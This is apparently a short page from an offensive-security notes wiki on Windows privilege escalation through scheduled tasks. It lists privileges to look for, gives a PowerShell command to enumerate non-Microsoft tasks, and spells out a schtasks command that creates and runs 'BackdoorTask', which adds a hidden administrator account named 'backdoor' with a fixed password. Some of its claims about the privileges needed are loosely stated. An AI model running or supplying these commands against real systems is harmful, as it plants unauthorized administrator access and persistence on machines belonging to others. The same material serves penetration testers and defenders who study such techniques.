Scheduled Tasks

Look for these critical privileges:

SeBatchLogonRight This privilege is required to create scheduled tasks.
SeCreateGlobalPrivilege While not mandatory, it can enhance your ability to execute tasks with elevated permissions.


Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

schtasks /create /tn "BackdoorTask" /tr "cmd.exe /c net user backdoor P@ssw0rd123! /add && net localgroup administrators backdoor /add" /sc once /st 00:00

schtasks /run /tn "BackdoorTask"

PreviousDLL Hijacking NextSeImpersonatePrivilege Exploit

Last updated 6 months ago

hashtagLook for these critical privileges:

Look for these critical privileges: